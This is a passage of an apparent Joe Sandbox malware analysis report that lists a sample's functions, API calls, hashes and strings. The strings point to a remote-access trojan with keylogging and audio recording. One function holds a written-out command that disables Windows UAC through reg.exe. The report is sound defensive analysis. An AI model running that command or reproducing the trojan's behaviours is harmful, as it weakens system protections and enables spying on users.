                                                                                          • GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040B1AD
                                                                                          • wsprintfW.USER32 ref: 0040B22E
                                                                                            • Part of subcall function 0040A671: SetEvent.KERNEL32(?,?,00000000,0040B245,00000000), ref: 0040A69D
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: EventLocalTimewsprintf
                                                                                          • String ID: [%04i/%02i/%02i %02i:%02i:%02i $Offline Keylogger Started$]
                                                                                          • API String ID: 1497725170-248792730
                                                                                          • Opcode ID: 7b20d03c37d9a1a3baa0d8ae1900ee4e121debabd9ed06dd085a81a1a50f0536
                                                                                          • Instruction ID: 4bcbbea8953a56f0834a7592719eb704c83d71ae81c48fe005db4fd1b538d991
                                                                                          • Opcode Fuzzy Hash: 7b20d03c37d9a1a3baa0d8ae1900ee4e121debabd9ed06dd085a81a1a50f0536
                                                                                          • Instruction Fuzzy Hash: 88114272404118AACB19AB96EC55CFE77BCEE48315B00012FF506A61D1FF7C5A45C6AD
                                                                                          Function 0041D5A0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 57registryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • RegisterClassExA.USER32(00000030), ref: 0041D5EC
                                                                                          • CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041D607
                                                                                          • GetLastError.KERNEL32 ref: 0041D611
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ClassCreateErrorLastRegisterWindow
                                                                                          • String ID: 0$MsgWindowClass
                                                                                          • API String ID: 2877667751-2410386613
                                                                                          • Opcode ID: 722de5e8388a8877474a119f468a3301e062738380f3873f65828015e8b741e1
                                                                                          • Instruction ID: e808ecd18ef19f47bd472c0c6462b34ef8490c58390ad3ae495a6aa035ed2a4b
                                                                                          • Opcode Fuzzy Hash: 722de5e8388a8877474a119f468a3301e062738380f3873f65828015e8b741e1
                                                                                          • Instruction Fuzzy Hash: 1F0125B1D00219ABDB00DFA5EC849EFBBBCEA08355F40453AF914A6241EB7589058AA4
                                                                                          Function 00407790 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 43processCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 004077D6
                                                                                          • CloseHandle.KERNEL32(?), ref: 004077E5
                                                                                          • CloseHandle.KERNEL32(?), ref: 004077EA
                                                                                          Strings
                                                                                          • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 004077CC
                                                                                          • C:\Windows\System32\cmd.exe, xrefs: 004077D1
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CloseHandle$CreateProcess
                                                                                          • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                                                                                          • API String ID: 2922976086-4183131282
                                                                                          • Opcode ID: c38a1c4fbaf06b70ee3143182280ce63ac5342037887d892980c2b2f1eb259a7
                                                                                          • Instruction ID: 1887ccd63cb29ce90d3c4a9dee080bc6fb52b3336ad705aa4023eed0db3a7680
                                                                                          • Opcode Fuzzy Hash: c38a1c4fbaf06b70ee3143182280ce63ac5342037887d892980c2b2f1eb259a7
                                                                                          • Instruction Fuzzy Hash: 04F09672D4029C76CB20ABD7AC0EEDF7F3CEBC5B11F00051AF904A2045DA745400CAB5
                                                                                          Function 0040729B Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 40COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          • C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe, xrefs: 004076FF
                                                                                          • Rmc-35QZU7, xrefs: 00407715
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe$Rmc-35QZU7
                                                                                          • API String ID: 0-923180022
                                                                                          • Opcode ID: 9875d9faf70918787a925bf8ffd0fe05ff0f1e0d4d07a7049234b56cd1ae4be9
                                                                                          • Instruction ID: 5ffff352cfcc2e87221e4fa572a01d73507d198e899e6baa5594ec663d9dd15d
                                                                                          • Opcode Fuzzy Hash: 9875d9faf70918787a925bf8ffd0fe05ff0f1e0d4d07a7049234b56cd1ae4be9
                                                                                          • Instruction Fuzzy Hash: 8DF02BB0E04600EBCB1477345D296AA3656A780397F40487BF507EB2F2EBBD5C41871E
                                                                                          Function 004433DA Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0044338B,?,?,0044332B,?), ref: 004433FA
                                                                                          • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0044340D
                                                                                          • FreeLibrary.KERNEL32(00000000,?,?,?,0044338B,?,?,0044332B,?), ref: 00443430
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                                                          • String ID: CorExitProcess$mscoree.dll
                                                                                          • API String ID: 4061214504-1276376045
                                                                                          • Opcode ID: ffd65e2a986ef432bd98aae630379cdfc9b477bc787d361fad657d5437817096
                                                                                          • Instruction ID: d7bd46dfab834bb5d48edea7818df211002af85bf4a2e706b61bd78119be3437
                                                                                          • Opcode Fuzzy Hash: ffd65e2a986ef432bd98aae630379cdfc9b477bc787d361fad657d5437817096
                                                                                          • Instruction Fuzzy Hash: 4EF04931900208FBDB159F65DC45B9EBF74EF04753F0040A5F805A2251DB758E40CA99
                                                                                          Function 004050E4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 35synchronizationCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00405120
                                                                                          • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 0040512C
                                                                                          • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 00405137
                                                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 00405140
                                                                                            • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                                                                                          • String ID: KeepAlive | Disabled
                                                                                          • API String ID: 2993684571-305739064
                                                                                          • Opcode ID: 1fd388f523b344ad3ce7bacd9f737274470046df98bc8577e1acfe76f453cfe4
                                                                                          • Instruction ID: dc79248355977efa3495ea8e96f68553e1f2867eb32bbe7dc6984d352a193ca4
                                                                                          • Opcode Fuzzy Hash: 1fd388f523b344ad3ce7bacd9f737274470046df98bc8577e1acfe76f453cfe4
                                                                                          • Instruction Fuzzy Hash: 5DF06D71904711BBDB203B758D0AAAB7E95AB06315F0009BEF982916E2D6798C408F9A
                                                                                          Function 0041AE51 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30sleepCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                          • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 0041AE83
                                                                                          • PlaySoundW.WINMM(00000000,00000000), ref: 0041AE91
                                                                                          • Sleep.KERNEL32(00002710), ref: 0041AE98
                                                                                          • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 0041AEA1
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: PlaySound$HandleLocalModuleSleepTime
                                                                                          • String ID: Alarm triggered
                                                                                          • API String ID: 614609389-2816303416
                                                                                          • Opcode ID: 715f6b18c41aa76fa9a4930845716c072d9d24f9be949641e6571375284beb95
                                                                                          • Instruction ID: 264e31dd7f8ae4a58c3cd97330858728e5483d82e525179ed11d996d756d41c5
                                                                                          • Opcode Fuzzy Hash: 715f6b18c41aa76fa9a4930845716c072d9d24f9be949641e6571375284beb95
                                                                                          • Instruction Fuzzy Hash: 3EE0D826A40220779A10337B6D0FD6F3D29CAC3B2570100BFFA05660C2DD540C01C6FB
                                                                                          Function 0041CDE9 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,0041CE7E), ref: 0041CDF3
                                                                                          • GetConsoleScreenBufferInfo.KERNEL32(00000000,?,?,?,?,?,?,?,0041CE7E), ref: 0041CE00
                                                                                          • SetConsoleTextAttribute.KERNEL32(00000000,0000000C,?,?,?,?,?,?,0041CE7E), ref: 0041CE0D
                                                                                          • SetConsoleTextAttribute.KERNEL32(00000000,?,?,?,?,?,?,?,0041CE7E), ref: 0041CE20
                                                                                          Strings
                                                                                          • ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 0041CE13
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Console$AttributeText$BufferHandleInfoScreen
                                                                                          • String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
                                                                                          • API String ID: 3024135584-2418719853
                                                                                          • Opcode ID: e39debb9b2b39d29e793f9bd33498d8add4ef2108ba1fa2e7e75c33182c8a1d6
                                                                                          • Instruction ID: 3099d3b49c49d1df3d44327ff87017ee7d1b0803ff7cdb2815dc6b7c28d9377e
                                                                                          • Opcode Fuzzy Hash: e39debb9b2b39d29e793f9bd33498d8add4ef2108ba1fa2e7e75c33182c8a1d6
                                                                                          • Instruction Fuzzy Hash: B6E04872504315E7E31027B5EC4DCAB7B7CE745613B100266FA16915D39A749C41C6B5
                                                                                          Function 004413EA Relevance: 7.7, APIs: 5, Instructions: 222COMMONLIBRARYCODE
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 52d86c3ce57e0cfe0599c5a04198a87027602046587802b200418d3fba34e127
                                                                                          • Instruction ID: 15e211ccade7fc2a5debfa8ad78d9bfa955d5b29a73147504924d067d3782226
                                                                                          • Opcode Fuzzy Hash: 52d86c3ce57e0cfe0599c5a04198a87027602046587802b200418d3fba34e127
                                                                                          • Instruction Fuzzy Hash: 2771D4319012569BEB21CF55C884AFFBB75EF55310F19412BE815672A0DB78CCC1CBA8
                                                                                          Function 0040F938 Relevance: 7.6, APIs: 5, Instructions: 132processCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 0041C048: GetCurrentProcess.KERNEL32(?,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C059
                                                                                            • Part of subcall function 0041C048: IsWow64Process.KERNEL32(00000000,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C060
                                                                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F956
                                                                                          • Process32FirstW.KERNEL32(00000000,?), ref: 0040F97A
                                                                                          • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F989
                                                                                          • CloseHandle.KERNEL32(00000000), ref: 0040FB40
                                                                                            • Part of subcall function 0041C076: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040F634,00000000,?,?,00475338), ref: 0041C08B
                                                                                            • Part of subcall function 0041C076: IsWow64Process.KERNEL32(00000000,?,?,?,00475338), ref: 0041C096
                                                                                            • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C286
                                                                                            • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C299
                                                                                          • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040FB31
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Process$OpenProcess32$NextWow64$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                                                                                          • String ID:
                                                                                          • API String ID: 2180151492-0
                                                                                          • Opcode ID: 8bc58311dc18a25ad1b21727c0348b30609c5b28e660f967249513ebcc30a9ec
                                                                                          • Instruction ID: d02cab962e177bd28921c4f9a71df23b762ba7d31cecf8da060328e0f3db66c6
                                                                                          • Opcode Fuzzy Hash: 8bc58311dc18a25ad1b21727c0348b30609c5b28e660f967249513ebcc30a9ec
                                                                                          • Instruction Fuzzy Hash: 5F4136311083419BC325F722DC51AEFB3A5AF94305F50493EF58A921E2EF385A49C65A
                                                                                          Function 00443E99 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: _free
                                                                                          • String ID:
                                                                                          • API String ID: 269201875-0
                                                                                          • Opcode ID: 1c82e8231a1e7df7fc61a9fb39ee41d92c56425fa3e393906510b0ca3dcf776a
                                                                                          • Instruction ID: bbec49e9ccdd5c2af131aecc9b6810ea24321c3eb42f74c08fbdd36582e243a3
                                                                                          • Opcode Fuzzy Hash: 1c82e8231a1e7df7fc61a9fb39ee41d92c56425fa3e393906510b0ca3dcf776a
                                                                                          • Instruction Fuzzy Hash: 5F41E232E00200AFEB14DF78C881A5EB3B5EF89B18F1545AEE915EB351D735AE05CB84
                                                                                          Function 004511AC Relevance: 7.6, APIs: 5, Instructions: 110COMMONLIBRARYCODE
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • MultiByteToWideChar.KERNEL32(?,00000000,?,00000000,00000000,00000000,0042DD92,?,?,?,00000001,00000000,?,00000001,0042DD92,0042DD92), ref: 004511F9
                                                                                          • __alloca_probe_16.LIBCMT ref: 00451231
                                                                                          • MultiByteToWideChar.KERNEL32(?,00000001,?,00000000,00000000,0042DD92,?,?,?,00000001,00000000,?,00000001,0042DD92,0042DD92,?), ref: 00451282
                                                                                          • GetStringTypeW.KERNEL32(00000001,00000000,00000000,00000001,?,?,?,00000001,00000000,?,00000001,0042DD92,0042DD92,?,00000002,00000000), ref: 00451294
                                                                                          • __freea.LIBCMT ref: 0045129D
                                                                                            • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                                                                          • String ID:
                                                                                          • API String ID: 313313983-0
                                                                                          • Opcode ID: 695a5f3fdf384fa9d4863fe56c7c43b71593cfbe7e8d533d6dff3d4dffab5c55
                                                                                          • Instruction ID: f723c28c07ecd650b398e20bb728631ced1c531215915adb10fa1f31571a6cea
                                                                                          • Opcode Fuzzy Hash: 695a5f3fdf384fa9d4863fe56c7c43b71593cfbe7e8d533d6dff3d4dffab5c55
                                                                                          • Instruction Fuzzy Hash: F7310331A0020AABDF249F65DC41EAF7BA5EB04701F0445AAFC08E72A2E739CC55CB94
                                                                                          Function 00401BE9 Relevance: 7.6, APIs: 5, Instructions: 71COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00401BF9
                                                                                          • waveInOpen.WINMM(00472AC0,000000FF,00472AA8,Function_00001D0B,00000000,00000000,00000024), ref: 00401C8F
                                                                                          • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401CE3
                                                                                          • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401CF2
                                                                                          • waveInStart.WINMM ref: 00401CFE
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                                                                                          • String ID:
                                                                                          • API String ID: 1356121797-0
                                                                                          • Opcode ID: e77b4b4e4653ae7db2ffa9ad3e4c491b15162175c47f56b782ba1ea702525e8d
                                                                                          • Instruction ID: 1e392cdedf79dd274444ae0cc0b76d6cc185fd36309c60cea9b16e967c73269b
                                                                                          • Opcode Fuzzy Hash: e77b4b4e4653ae7db2ffa9ad3e4c491b15162175c47f56b782ba1ea702525e8d
                                                                                          • Instruction Fuzzy Hash: 51212A71604201AFC7399F66EE15A6A7BB6FB94715B00803FA10DD76B1DBB84881CB5C
                                                                                          Function 0044F3DA Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetEnvironmentStringsW.KERNEL32 ref: 0044F3E3
                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044F406
                                                                                            • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044F42C
                                                                                          • _free.LIBCMT ref: 0044F43F
                                                                                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044F44E
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                          • String ID:
                                                                                          • API String ID: 336800556-0
                                                                                          • Opcode ID: 5a321bf6ad982bb41f22afd847bffa7b7f2aa598f804dd442cdb837d811de21f
                                                                                          • Instruction ID: b6d7bf627ac8e1e23e8e90154f8049d5dc13ee9613ce4caf203d647ba434722a
                                                                                          • Opcode Fuzzy Hash: 5a321bf6ad982bb41f22afd847bffa7b7f2aa598f804dd442cdb837d811de21f
                                                                                          • Instruction Fuzzy Hash: 2401DF72602721BF37211ABB5C8DC7F6AACDEC6FA5355013AFD04D2202DE688D0691B9
                                                                                          Function 00448319 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetLastError.KERNEL32(?,00000000,00000000,0043BCD6,00000000,00000000,?,0043BD5A,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044831E
                                                                                          • _free.LIBCMT ref: 00448353
                                                                                          • _free.LIBCMT ref: 0044837A
                                                                                          • SetLastError.KERNEL32(00000000,?,00405103), ref: 00448387
                                                                                          • SetLastError.KERNEL32(00000000,?,00405103), ref: 00448390
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ErrorLast$_free
                                                                                          • String ID:
                                                                                          • API String ID: 3170660625-0
                                                                                          • Opcode ID: 9e58827e066efea2178fd81b79d5a13276d1a5d22b614d366fbfb6265f5784d7
                                                                                          • Instruction ID: 5af5a014564f127a9d6b3613d5887cb4baea3ca98ff5bc54bcf39f1731b7af1a
                                                                                          • Opcode Fuzzy Hash: 9e58827e066efea2178fd81b79d5a13276d1a5d22b614d366fbfb6265f5784d7
                                                                                          • Instruction Fuzzy Hash: 3401F936100B006BB7117A2A5C45E6F3259DBD2B75B35093FFD1892292EF7ECC02812D
                                                                                          Function 0041C26E Relevance: 7.5, APIs: 5, Instructions: 48COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C286
                                                                                          • OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C299
                                                                                          • GetProcessImageFileNameW.PSAPI(00000000,?,00000104,?,00000000,00000000,00000000), ref: 0041C2B9
                                                                                          • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041C2C4
                                                                                          • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041C2CC
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Process$CloseHandleOpen$FileImageName
                                                                                          • String ID:
                                                                                          • API String ID: 2951400881-0
                                                                                          • Opcode ID: e1074fac5642d3b73ea46f905cbac139ffb473db2c7b30d838fbef5372722d9f
                                                                                          • Instruction ID: 82f86893bb8475317186349f6084970b7a3011258d8579340058f5d8518f4318
                                                                                          • Opcode Fuzzy Hash: e1074fac5642d3b73ea46f905cbac139ffb473db2c7b30d838fbef5372722d9f
                                                                                          • Instruction Fuzzy Hash: 9C01F231680215ABD61066949C8AFA7B66C8B84756F0001ABFA08D22A2EF74CD81466A
                                                                                          Function 00450A3C Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • _free.LIBCMT ref: 00450A54
                                                                                            • Part of subcall function 00446802: RtlFreeHeap.NTDLL(00000000,00000000,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?), ref: 00446818
                                                                                            • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                                                          • _free.LIBCMT ref: 00450A66
                                                                                          • _free.LIBCMT ref: 00450A78
                                                                                          • _free.LIBCMT ref: 00450A8A
                                                                                          • _free.LIBCMT ref: 00450A9C
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                          • String ID:
                                                                                          • API String ID: 776569668-0
                                                                                          • Opcode ID: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                                                                                          • Instruction ID: 72fff71e7c38304dd33e0b5962bcef44c8ad6e5fbb3f6de42623dcf71f8de19c
                                                                                          • Opcode Fuzzy Hash: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
